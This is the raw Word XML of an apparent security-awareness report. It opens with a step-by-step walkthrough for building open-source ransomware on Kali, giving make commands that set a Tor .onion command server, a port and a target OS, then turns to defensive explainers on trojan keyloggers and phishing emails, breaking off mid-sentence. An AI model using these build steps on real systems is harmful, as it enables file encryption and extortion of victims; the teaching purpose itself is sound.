            <w:color w:val="000000" w:themeColor="text1"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>https://github.com/mauri870/ransomware</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="284F86A4"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Step #2: Export GO Environment variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DED13DA"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Next, we need to set some environment variables to direct the binaries and GO to the appropriate directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1F569B"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Step #3: Make the source code dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4A4BED"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Now, with the variables set and exported, we need to make the dependencies. Navigate to the new directory, ransomware, and enter make deps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294FB836"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kali &gt; cd ransomware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725AC5C8"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kali &gt; make deps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F628584"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p>
    <w:p w14:paraId="21A8D62C"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p>
    <w:p w14:paraId="652D18D2"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Step #4: Make the Source Code with options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1E0B08"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Now that we have completed the deps make, we can begin to make the source code. In our case, we will use a few options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3199E41C"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First, we want to use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ToR</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to encrypt our communications over the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ToR</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network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D0D478"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USE_TOR=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2173F8AE"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Second, we want to use our dark web server at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hackersarisegtdj.onion</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(you can use any domain or localhost).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7917F310"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SERVER_HOST=</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hackersarisegtdj.onion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="26D4B46F"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 xml:space="preserve">Third, we want to use </w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">port 80 </w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>(you can use any port).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491AD779"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SERVER_PORT=80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C90BEF"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Finally, we want to set the operating system to compile the source code for our operating system, in this case, Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDB9489"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GOOS=</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linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7EDE14E5"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Our command should look something like this;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D4A02F"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kali &gt; make -e USE_TOR=true SERVER_HOST=</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hackersarisegtdj.onion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> SERVER_PORT=80 GOOS=</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linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="001202D2"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Now hit ENTER and watch your ransomware compile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E02DA4D"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Step #5: Check the Directory for ransomware.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7D95A9"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Once the source code has been generated, do a long listing on the ransomware directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E36C22"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kali &gt; ls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B811DE"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Now, navigate to the bin directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6592505B"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kali &gt; cd bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3921A3AD"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Here, you will see the ransomware.exe, the server and unlocker.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A90FDE9"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br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0769BA3A"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Step #6: Examine the Types of Files to be Encrypted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E19E9BB"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">If you want to see what types of files this ransomware will encrypt, navigate to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>cmd</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directory and open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common.go</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4328A0A5"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 xml:space="preserve">kali &gt; cd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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08A7C192"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val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">kali &gt; more </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>common.go</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="26B9B989" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02BD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2C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Here, you can see the file extensions that this ransomware will target to encrypt when executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DD39B2" w14:textId="77777777" w:rsidR="008C082C" w:rsidRPr="002C7722" w:rsidRDefault="008C082C" w:rsidP="00A02BD7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C72776B" w14:textId="20B055ED"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Keylogger for Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7848CB42"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Trojan Keyloggers: Understanding the Threat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAA93E5"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Trojan keyloggers are a type of malicious software that disguises itself as legitimate or desirable software but secretly monitors and records keystrokes on an infected system. These stealthy threats pose significant risks to user privacy, as they can capture sensitive information such as usernames, passwords, credit card details, and other confidential data. Understanding how Trojan keyloggers operate is essential in order to detect and mitigate their impact effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F887D6" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="00DA1F4A" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:num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Infection Methods: How Trojan Keyloggers Spread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E80202A"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 xml:space="preserve">Trojan keyloggers can infect systems using various methods, often exploiting </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA1F4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DA1F4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> or employing social engineering tactics to gain access. Here are some common infection methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245EDC2D"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a) Malicious Downloads: Users may unknowingly install Trojan keyloggers by downloading infected files or software from untrusted sources. These files can be disguised as legitimate applications or bundled with pirated software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663179EB"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b) Email Attachments: Trojan keyloggers can be distributed through phishing emails that trick users into opening malicious attachments. Once opened, the keylogger is installed silently in the background.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131F28D4"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c) Drive-by Downloads: Visiting compromised websites or clicking on malicious ads can initiate drive-by downloads, where the Trojan keylogger is automatically downloaded and executed without the user's knowledge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6E1B8B"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d) Software Vulnerabilities: Exploiting security vulnerabilities in outdated software or plugins is another common method used to infect systems with Trojan keyloggers. Attackers take advantage of unpatched software to gain access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742364C1" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="00DA1F4A" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:num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Keylogging Functionality: How Trojan Keyloggers Operate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDD4856"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Once a Trojan keylogger infects a system, it starts capturing and recording keystrokes, providing attackers with valuable information. Here's an overview of their functionality:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202CC769"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a) Keystroke Logging: Trojan keyloggers monitor and record all keystrokes made by the user, capturing sensitive information entered through the keyboard. This includes login credentials, personal messages, financial details, and other typed data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EADB83"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lastRenderedPageBreak/>
        <w:t>b) Stealth Mode: To avoid detection, Trojan keyloggers operate silently in the background, often disguising their processes and hiding their presence from the user and security software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF41EA8"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c) Data Exfiltration: Captured keystrokes are typically stored locally on the infected system before being exfiltrated to the attacker's command-and-control server. This can occur at predetermined intervals or when the system connects to the internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C490CCA"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d) Remote Access: Advanced Trojan keyloggers may provide attackers with remote access to the infected system, enabling them to perform additional malicious activities beyond keylogging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18874042" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="00DA1F4A" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:num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Risks and Impacts: The Dangers of Trojan Keyloggers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B8F43A"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Trojan keyloggers pose significant risks to both individuals and organizations. Here are some of the dangers and potential impacts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7E1D27"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a) Data Theft: By capturing keystrokes, Trojan keyloggers expose sensitive information such as passwords, credit card details, personal messages, and confidential business data. Attackers can misuse this information for identity theft, financial fraud, or corporate espionage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3130F7"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b) Unauthorized Access: In addition to keylogging, Trojan keyloggers can provide attackers with unauthorized access to infected systems, allowing them to execute commands, install additional malware, or compromise system security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C305EBB"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c) Privacy Invasion: Trojan keyloggers violate user privacy by secretly monitoring and recording their activities. This intrusion can lead to personal and professional repercussions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AEEE18"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d) System Performance Issues: The presence of Trojan keyloggers can impact system performance, causing slowdowns, freezes, and crashes due to the resource-intensive nature of keylogging processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF0F779" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="00DA1F4A" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:num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Mitigating the Threat: Protecting Against Trojan Keyloggers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A528DE3"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To protect against Trojan keyloggers, it's essential to adopt robust security practices and preventive measures. Here are some key strategies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1A0865"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a) Updated Security Software: Install and regularly update reputable antivirus and antimalware software to detect and remove Trojan keyloggers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC0D6BE"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b) Patch Management: Keep operating systems, software, and plugins up to date with the latest security patches to prevent exploitation of vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FB1EDF"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c) Safe Browsing Habits: Exercise caution when downloading files or software from untrusted sources and avoid clicking on suspicious links or email attachments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DC47C6"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d) User Education: Educate users about the risks of social engineering tactics and the importance of practicing safe computing habits, such as using strong, unique passwords and being wary of phishing attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABA4D05"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e) Firewall and Intrusion Detection: Enable and configure firewalls and intrusion detection systems to monitor network traffic and block unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0829ADB5"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lastRenderedPageBreak/>
        <w:t>By implementing these preventive measures and maintaining a proactive approach to cybersecurity, individuals and organizations can reduce the risk of falling victim to Trojan keyloggers and safeguard their sensitive information from unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F9BA04"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Remember, staying vigilant and adopting a multi-layered security approach is crucial in defending against Trojan keyloggers and other evolving threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DB483E" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="0031366D" w:rsidRDefault="00DA1F4A" w:rsidP="00A02BD7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33F94A35" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="0031366D" w:rsidRDefault="00A02BD7" w:rsidP="00A02BD7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Phishing attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43927EB5"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Phishing Emails: Recognizing and Avoiding the Threat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6613B387"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Phishing emails are deceptive messages sent by cybercriminals with the intention of tricking recipients into revealing sensitive information, such as usernames, passwords, credit card details, or personal data. These fraudulent emails often mimic legitimate organizations or individuals, aiming to exploit human trust and manipulate victims into taking actions that can lead to financial loss or identity theft. Understanding the characteristics of phishing emails is crucial in order to identify and avoid falling victim to these scams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDB30B7" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="00DA1F4A" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:num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Common Phishing Techniques: How Phishing Emails Work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE89AD3"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Phishing emails employ various techniques to deceive recipients. Understanding these tactics can help individuals recognize and avoid falling for phishing scams. Here are some common techniques used in phishing emails:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398848ED"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a) Spoofed Identities: Phishing emails often impersonate legitimate organizations, such as banks, online retailers, or social media platforms, by using logos, branding, and email addresses that closely resemble the genuine ones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C626F62"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b) Urgency and Threats: Phishing emails create a sense of urgency or fear to prompt immediate action from recipients. They may claim that an account has been compromised, a payment is overdue, or there is a security issue that requires immediate attention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2757E0CA"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c) Social Engineering: Phishing emails exploit human emotions and vulnerabilities by appealing to recipients' curiosity, greed, or desire for help. They may offer enticing rewards, prizes, or financial opportunities to lure victims into disclosing sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71576538"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d) Fake Websites and Forms: Phishing emails often contain links that direct recipients to fake websites or forms designed to collect personal information. These websites mimic legitimate ones, aiming to trick victims into entering their confidential data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D30C41" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="00DA1F4A" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:num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Red Flags: Identifying Phishing Emails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B89FDA4"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While phishing emails can be sophisticated, there are several red flags that can help identify them. Being aware of these indicators can prevent falling victim to phishing scams. Here are some common red flags to look out for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D46939"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a) Suspicious Sender Email Address: Pay attention to the email sender's address. Phishing emails may use email addresses that resemble but slightly differ from legitimate ones. For example, "</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA1F4A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t>support@yourbankk.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA1F4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>" instead of "</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA1F4A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t>support@yourbank.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA1F4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD5983C"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lastRenderedPageBreak/>
        <w:t>b) Poor Grammar and Spelling: Phishing emails often contain spelling and grammatical errors. Legitimate organizations typically proofread their communications, so poor language quality can indicate a phishing attempt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3DF842"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c) Requests for Personal Information: Be cautious of emails that request personal or sensitive information, such as passwords, social security numbers, or credit card details. Legitimate organizations rarely ask for such information via email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E61CF7" w14:textId="38BB10A0"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d) Suspicious Links and Attachments: Hover over links to check their actual destination before clicking. Phishing emails may contain shortened URLs or links that lead to malicious websites. Similarly, avoid opening unexpected attachments, as they may contain malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F22286" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="00DA1F4A" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:num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Protecting Against Phishing Emails: Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54232CA5"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Protecting yourself and your organization against phishing emails requires a proactive approach and adherence to best practices. Here are essential measures to mitigate the risk:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64749818"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 xml:space="preserve">a) Education and Awareness: Regularly educate yourself and employees about phishing techniques, red flags, and safe email practices. Encourage </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA1F4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>skepticism</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA1F4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and provide training to recognize and report phishing attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FBCEF9"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b) Verify Email Sources: Independently verify the authenticity of an email by contacting the organization directly using trusted contact information. Avoid using contact details provided in the email itself, as they may be fake.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424002C5"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 xml:space="preserve">c) Use Antispam and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA1F4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Antiphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA1F4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Filters: Enable and regularly update antispam and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA1F4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>antiphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA1F4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> filters on email servers and clients. These filters can help detect and block suspicious emails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB71104"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d) Implement Two-Factor Authentication (2FA): Enable 2FA for accounts whenever possible. This adds an extra layer of security by requiring an additional verification step, even if a password is compromised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06148AF1"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e) Keep Software Updated: Maintain up-to-date software, including operating systems, web browsers, and antivirus software. Regular updates often include security patches that address vulnerabilities exploited by phishing attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D22F3C6"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f) Report and Delete: If you receive a phishing email, report it to your organization's IT department, the email service provider, or relevant authorities. Delete the email without interacting with any links or attachments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EEE3EC" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="00DA1F4A" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA1F4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">By adopting these preventive measures and maintaining a security-conscious mindset, individuals and organizations can significantly reduce the risk of falling victim to phishing emails. Remember, vigilance and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA1F4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>skepticism</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA1F4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
